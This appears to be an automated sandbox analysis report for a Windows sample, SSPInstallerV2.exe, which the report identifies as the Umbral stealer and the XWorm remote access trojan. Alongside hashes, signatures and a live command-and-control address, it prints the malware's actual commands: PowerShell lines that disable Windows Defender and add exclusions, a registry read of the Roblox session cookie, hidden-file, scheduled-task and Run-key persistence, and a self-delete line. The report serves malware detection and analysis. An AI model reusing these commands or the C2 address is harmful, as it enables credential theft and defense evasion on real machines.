umbral | 2f724138cbe4102823295fb51e7edb615b95a0eeae09434596e70f28bc0e64a9

Analysis

max time kernel
97s
max time network
105s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03-08-2024 15:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SSPInstallerV2.exe
Size

634KB
MD5

8f27d14a78615dc0c6d100ca3f96a86a
SHA1

3d267acd9ae52e0585e091826a57af1a53450ae6
SHA256

2f724138cbe4102823295fb51e7edb615b95a0eeae09434596e70f28bc0e64a9
SHA512

0af71aed92eda0f10cd435a542d3b6fbada85be89e4d94f5c029ee81b0c0167140cf801bfdaa816d479aa435741a337f827be61683ffd32367d1b1c2d276c7d7
SSDEEP

6144:3kuuqTIKE3cPTWyG08SLGf5FKlunGth1mQVSomL3To7ovjqjvrKi5z5XThDLGfwk:3DuqhE3cPqy9uuunGtNSnP/OzHST

Score

10^/10

umbral xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

by-thus.gl.at.ply.gg:35938

Attributes

Install_directory
%Temp%
install_file
SSPinstaller.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023419-6.dat	family_umbral
behavioral2/memory/3080-14-0x000002BBAF050000-0x000002BBAF0AA000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023479-18.dat	family_xworm
behavioral2/memory/1400-26-0x0000000000730000-0x0000000000760000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1056	powershell.exe
2756	powershell.exe
1700	powershell.exe
3620	powershell.exe
2964	powershell.exe
4104	powershell.exe
4480	powershell.exe
2572	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	requestInstall.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	SSPInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	SSPInstallerV2.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSPinstaller.lnk	SSPInstaller.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSPinstaller.lnk	SSPInstaller.exe

Executes dropped EXE 2 IoCs

pid	Process
3080	requestInstall.exe
1400	SSPInstaller.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSPinstaller = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SSPinstaller.exe"	SSPInstaller.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com
23	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3628	cmd.exe
4924	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1412	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4700	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4924	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4912	schtasks.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
3080	requestInstall.exe
2964	powershell.exe
2964	powershell.exe
1700	powershell.exe
1700	powershell.exe
1056	powershell.exe
1056	powershell.exe
3520	powershell.exe
3520	powershell.exe
2756	powershell.exe
2756	powershell.exe
4104	powershell.exe
4104	powershell.exe
4480	powershell.exe
4480	powershell.exe
2572	powershell.exe
2572	powershell.exe
3620	powershell.exe
3620	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1400	SSPInstaller.exe
Token: SeDebugPrivilege	3080	requestInstall.exe
Token: SeIncreaseQuotaPrivilege	3612	wmic.exe
Token: SeSecurityPrivilege	3612	wmic.exe
Token: SeTakeOwnershipPrivilege	3612	wmic.exe
Token: SeLoadDriverPrivilege	3612	wmic.exe
Token: SeSystemProfilePrivilege	3612	wmic.exe
Token: SeSystemtimePrivilege	3612	wmic.exe
Token: SeProfSingleProcessPrivilege	3612	wmic.exe
Token: SeIncBasePriorityPrivilege	3612	wmic.exe
Token: SeCreatePagefilePrivilege	3612	wmic.exe
Token: SeBackupPrivilege	3612	wmic.exe
Token: SeRestorePrivilege	3612	wmic.exe
Token: SeShutdownPrivilege	3612	wmic.exe
Token: SeDebugPrivilege	3612	wmic.exe
Token: SeSystemEnvironmentPrivilege	3612	wmic.exe
Token: SeRemoteShutdownPrivilege	3612	wmic.exe
Token: SeUndockPrivilege	3612	wmic.exe
Token: SeManageVolumePrivilege	3612	wmic.exe
Token: 33	3612	wmic.exe
Token: 34	3612	wmic.exe
Token: 35	3612	wmic.exe
Token: 36	3612	wmic.exe
Token: SeIncreaseQuotaPrivilege	3612	wmic.exe
Token: SeSecurityPrivilege	3612	wmic.exe
Token: SeTakeOwnershipPrivilege	3612	wmic.exe
Token: SeLoadDriverPrivilege	3612	wmic.exe
Token: SeSystemProfilePrivilege	3612	wmic.exe
Token: SeSystemtimePrivilege	3612	wmic.exe
Token: SeProfSingleProcessPrivilege	3612	wmic.exe
Token: SeIncBasePriorityPrivilege	3612	wmic.exe
Token: SeCreatePagefilePrivilege	3612	wmic.exe
Token: SeBackupPrivilege	3612	wmic.exe
Token: SeRestorePrivilege	3612	wmic.exe
Token: SeShutdownPrivilege	3612	wmic.exe
Token: SeDebugPrivilege	3612	wmic.exe
Token: SeSystemEnvironmentPrivilege	3612	wmic.exe
Token: SeRemoteShutdownPrivilege	3612	wmic.exe
Token: SeUndockPrivilege	3612	wmic.exe
Token: SeManageVolumePrivilege	3612	wmic.exe
Token: 33	3612	wmic.exe
Token: 34	3612	wmic.exe
Token: 35	3612	wmic.exe
Token: 36	3612	wmic.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	864	wmic.exe
Token: SeSecurityPrivilege	864	wmic.exe
Token: SeTakeOwnershipPrivilege	864	wmic.exe
Token: SeLoadDriverPrivilege	864	wmic.exe
Token: SeSystemProfilePrivilege	864	wmic.exe
Token: SeSystemtimePrivilege	864	wmic.exe
Token: SeProfSingleProcessPrivilege	864	wmic.exe
Token: SeIncBasePriorityPrivilege	864	wmic.exe
Token: SeCreatePagefilePrivilege	864	wmic.exe
Token: SeBackupPrivilege	864	wmic.exe
Token: SeRestorePrivilege	864	wmic.exe
Token: SeShutdownPrivilege	864	wmic.exe
Token: SeDebugPrivilege	864	wmic.exe
Token: SeSystemEnvironmentPrivilege	864	wmic.exe
Token: SeRemoteShutdownPrivilege	864	wmic.exe
Token: SeUndockPrivilege	864	wmic.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 3124 wrote to memory of 3080	3124	SSPInstallerV2.exe	82
PID 3124 wrote to memory of 3080	3124	SSPInstallerV2.exe	82
PID 3124 wrote to memory of 1400	3124	SSPInstallerV2.exe	83
PID 3124 wrote to memory of 1400	3124	SSPInstallerV2.exe	83
PID 3080 wrote to memory of 3612	3080	requestInstall.exe	85
PID 3080 wrote to memory of 3612	3080	requestInstall.exe	85
PID 3080 wrote to memory of 3596	3080	requestInstall.exe	90
PID 3080 wrote to memory of 3596	3080	requestInstall.exe	90
PID 3080 wrote to memory of 2964	3080	requestInstall.exe	92
PID 3080 wrote to memory of 2964	3080	requestInstall.exe	92
PID 3080 wrote to memory of 1700	3080	requestInstall.exe	94
PID 3080 wrote to memory of 1700	3080	requestInstall.exe	94
PID 3080 wrote to memory of 1056	3080	requestInstall.exe	96
PID 3080 wrote to memory of 1056	3080	requestInstall.exe	96
PID 3080 wrote to memory of 3520	3080	requestInstall.exe	98
PID 3080 wrote to memory of 3520	3080	requestInstall.exe	98
PID 3080 wrote to memory of 864	3080	requestInstall.exe	100
PID 3080 wrote to memory of 864	3080	requestInstall.exe	100
PID 3080 wrote to memory of 5056	3080	requestInstall.exe	102
PID 3080 wrote to memory of 5056	3080	requestInstall.exe	102
PID 3080 wrote to memory of 4588	3080	requestInstall.exe	104
PID 3080 wrote to memory of 4588	3080	requestInstall.exe	104
PID 3080 wrote to memory of 2756	3080	requestInstall.exe	106
PID 3080 wrote to memory of 2756	3080	requestInstall.exe	106
PID 3080 wrote to memory of 4700	3080	requestInstall.exe	108
PID 3080 wrote to memory of 4700	3080	requestInstall.exe	108
PID 1400 wrote to memory of 4104	1400	SSPInstaller.exe	110
PID 1400 wrote to memory of 4104	1400	SSPInstaller.exe	110
PID 1400 wrote to memory of 4480	1400	SSPInstaller.exe	112
PID 1400 wrote to memory of 4480	1400	SSPInstaller.exe	112
PID 1400 wrote to memory of 2572	1400	SSPInstaller.exe	114
PID 1400 wrote to memory of 2572	1400	SSPInstaller.exe	114
PID 3080 wrote to memory of 3628	3080	requestInstall.exe	116
PID 3080 wrote to memory of 3628	3080	requestInstall.exe	116
PID 3628 wrote to memory of 4924	3628	cmd.exe	118
PID 3628 wrote to memory of 4924	3628	cmd.exe	118
PID 1400 wrote to memory of 3620	1400	SSPInstaller.exe	119
PID 1400 wrote to memory of 3620	1400	SSPInstaller.exe	119
PID 1400 wrote to memory of 4912	1400	SSPInstaller.exe	121
PID 1400 wrote to memory of 4912	1400	SSPInstaller.exe	121
PID 1400 wrote to memory of 4512	1400	SSPInstaller.exe	125
PID 1400 wrote to memory of 4512	1400	SSPInstaller.exe	125
PID 1400 wrote to memory of 3400	1400	SSPInstaller.exe	127
PID 1400 wrote to memory of 3400	1400	SSPInstaller.exe	127
PID 3400 wrote to memory of 1412	3400	cmd.exe	129
PID 3400 wrote to memory of 1412	3400	cmd.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3596	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SSPInstallerV2.exe
"C:\Users\Admin\AppData\Local\Temp\SSPInstallerV2.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3124
- C:\Users\Admin\AppData\Roaming\requestInstall.exe
  "C:\Users\Admin\AppData\Roaming\requestInstall.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3080
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3612
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\requestInstall.exe"
    3⤵
    - Views/modifies file attributes
    PID:3596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\requestInstall.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3520
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:864
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:5056
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2756
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4700
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\requestInstall.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3628
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4924
- C:\Users\Admin\AppData\Roaming\SSPInstaller.exe
  "C:\Users\Admin\AppData\Roaming\SSPInstaller.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SSPInstaller.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSPInstaller.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSPinstaller.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSPinstaller.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3620
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SSPinstaller" /tr "C:\Users\Admin\AppData\Local\Temp\SSPinstaller.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4912
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /f /tn "SSPinstaller"
    3⤵
    PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1BEF.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
623c41f054ece8bf9a23740ab44a5140

SHA1
b8de5a5dbec7ffec7ddc41192b557ab6b723cda2

SHA256
5a85bfc48c069de6568556da458786113baf080cc8e1e009d0e013a713b4f7c2

SHA512
d19fc5ed8e918755eeba82a8bc9a2994e54582ff6c41ad91b4a4e554974bb0e250422ab17d28a29cbeef01e317faa5b8a3ebef537f69f45d86a56896c7785784

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f3ae002b5480d0737dfd0b1f813dace9

SHA1
409c771f2188c64dcc587f8f56845b4e052c6d66

SHA256
cd9e0face6d84a1fd5e0bd36781e09f0e0c79c00c2a6063dfcfd4f69eb4da50a

SHA512
5e8af7d1f6331197c2c6c759ec572ed66e7e1d91fda5b11be29e989b621b1ca9cf737332b534d01c77e3182fb1b9b77ffbe6e1b9cb40c194b4d561ec8c97296f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60945d1a2e48da37d4ce8d9c56b6845a

SHA1
83e80a6acbeb44b68b0da00b139471f428a9d6c1

SHA256
314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

SHA512
5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9de528cab23a687528d40e7d4863427e

SHA1
27fb00ac7872fad0c1dba1c1071c946c4be60821

SHA256
84143fc034cadb25a535116a01da7243968a3e9c9b7bc5cde577f7b84d9c2365

SHA512
2fb29b6915338189833c665abd8128899178b448b106bba6859ec2abea176c06aa469d911f09f5fc8b5e36755471a1a970206ef8e12deaeeaa164fe9df4d3f1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sdupvlmh.3do.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1BEF.tmp.bat

Filesize
161B

MD5
0a2e8b800449cf883597091ea8d0ee18

SHA1
9e9eb355f86d568d055830f3334e34a8c1e69f13

SHA256
1b6dbfe62d4a5c142ff07ec5ac80d87bb0a4985d9cad53360eebc99d08a48365

SHA512
c9954916ada317845dac850f81eca0d4ddfe7be103b2b7ca75479cc2ccaec5956af8afbb172a61006514c03399a2bd3dbc0c2fc72896a4ca95b6863a518f0c1c

Download Submit
C:\Users\Admin\AppData\Roaming\SSPInstaller.exe

Filesize
171KB

MD5
c9e72423dd94f42bf222d9a7fdb6eff9

SHA1
c724cd012c0c17a9222427d021fab0f3a0f25ac0

SHA256
8dcffd289f6b10088c345182b1d28ae492a3875b05af7f06dc0ff1d504461a16

SHA512
6265cfddc5320ef22954dae241a4988898ca6a80b48e1269f9b9df6ad22603dfd4f456d76b524062e904c00609ae9084728229872f8311120d9e71ed9db40b80

Download Submit
C:\Users\Admin\AppData\Roaming\requestInstall.exe

Filesize
338KB

MD5
4cd80597cf008592993ec6ec3780549c

SHA1
827a960dcc89c07cf8a80c97e2f2a281474d8c7f

SHA256
48c41a739d33db337ca33ab78b31e7bb13378508af1b2b8168594cc12268134b

SHA512
024fc64eaddc10370e64fe6531030e92a0c666c40737dccae071927c36fca86cb3c0828589014a6e3d1a108846e3bbde1be3c3afe2a996f9b843e9fb51b3b43d

Download Submit
memory/1400-28-0x00007FF844510000-0x00007FF844FD1000-memory.dmp

Filesize
10.8MB

Download
memory/1400-169-0x00007FF844510000-0x00007FF844FD1000-memory.dmp

Filesize
10.8MB

Download
memory/1400-162-0x000000001CCB0000-0x000000001CCBC000-memory.dmp

Filesize
48KB

Download
memory/1400-161-0x00007FF844510000-0x00007FF844FD1000-memory.dmp

Filesize
10.8MB

Download
memory/1400-26-0x0000000000730000-0x0000000000760000-memory.dmp

Filesize
192KB

Download
memory/2964-29-0x000001F95B9E0000-0x000001F95BA02000-memory.dmp

Filesize
136KB

Download
memory/3080-144-0x00007FF844510000-0x00007FF844FD1000-memory.dmp

Filesize
10.8MB

Download
memory/3080-27-0x00007FF844510000-0x00007FF844FD1000-memory.dmp

Filesize
10.8MB

Download
memory/3080-94-0x000002BBC9790000-0x000002BBC97A2000-memory.dmp

Filesize
72KB

Download
memory/3080-57-0x000002BBC9730000-0x000002BBC974E000-memory.dmp

Filesize
120KB

Download
memory/3080-14-0x000002BBAF050000-0x000002BBAF0AA000-memory.dmp

Filesize
360KB

Download
memory/3080-93-0x000002BBC9760000-0x000002BBC976A000-memory.dmp

Filesize
40KB

Download
memory/3080-55-0x000002BBC97B0000-0x000002BBC9826000-memory.dmp

Filesize
472KB

Download
memory/3080-56-0x000002BBC9830000-0x000002BBC9880000-memory.dmp

Filesize
320KB

Download
memory/3124-0-0x00007FF844513000-0x00007FF844515000-memory.dmp

Filesize
8KB

Download
memory/3124-1-0x0000000000210000-0x00000000002B4000-memory.dmp

Filesize
656KB

Download